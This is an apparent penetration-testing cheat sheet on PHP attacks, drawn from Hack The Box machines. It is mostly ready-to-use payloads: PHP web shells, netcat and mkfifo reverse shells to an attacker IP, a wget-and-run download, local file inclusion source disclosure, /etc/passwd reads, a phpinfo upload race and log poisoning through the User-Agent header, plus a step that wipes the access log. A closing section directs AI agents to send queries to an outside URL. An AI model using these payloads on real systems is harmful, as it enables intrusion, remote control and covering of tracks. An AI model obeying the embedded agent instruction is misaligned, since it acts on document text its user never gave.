# php

## Basics

* Combined with a[ Local File Inclusion](/04-webapps/lfi.md), you can make php get you a shell
* REF: [phpLite](/04-webapps/phplite.md), ninevehHTB, [WebInjections](/04-webapps/03-webapp.md), [ReverseShells](/03-getting-in/03-reverseshell-php.md#php-web-shell)
* Make sure to URL Encode your Injection with [Burp](/02-scanning/burp.md#url-encode) or [MeyerWeb](https://meyerweb.com/eric/tools/dencoder/)

## Reverse Shell

* Two options to try:

```
<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f
```

## Downloading

```
<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>
```

## php explore

* REF: poisonHTB

```
https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)
```

## phpinfo - fileupload - vulnerability

* Check options for: **phpinfo.php**
* If 'fileupload = ON' - it will receive any files you send.
* php will save them to a cache directory (normally not available to users)
* But with an LFI you may get code-execution
* Test with Burp Intercept:

```
POST /phpinfo.php HTTP/1.1   
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain
Does this work
----HelloWorld

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES("blah")             ..found!
```

## phpinfo - LFI

* <https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf>
* Github > [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) > FileInclusion > **phpinfolfi.py**

```
---------------------
---------------------
Replace the PAYLOAD with a full reverse-payload
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits.. just focus on swapping the php line
<?php...;?>

---------------------
---------------------
locate php-reverse
php-reverse-shell.php
paste into phpinfolfi.py as 'payload'
<?php...?>
update ip, port
del comments
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed twice in script

---------------------
---------------------
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell
```

## Log Poisoning

* Submit an evil log entry (custom User-Agent)
* Execute it Viewing the log with an LFI
* If php tags are 'hidden' then they are interpreted, and we can inject our payload
* REF: [php](/04-webapps/php-tricks.md), poisonHTB

```
TEST 1

View Log:
https://$IP/browse.php > /var/log/httpd-access.log
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
Notice "Hello World" was sent as the User-Agent
We have control over this field, and we can send malicious payload here
```

```
TEST 2

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log
php-tags were read (ie: dont see them written in plain-text)
Meaning we have execution!
```

```
EXPLOIT

Burp > Repeater > Custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need burp url-encode)

nc -nvlp 4444  ..connected!
```

```
bsd reverse netcat
bsd doesnt like the 'normal' reverse

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe
```

```
Log issue:

vi /var/log/httpd-access.log
delete our bad-line from earlier mistake, oops
because we used echo "Hello World" with double-quotes

Wipe the log file:
echo "" > httpd-access.log
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/php-tricks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.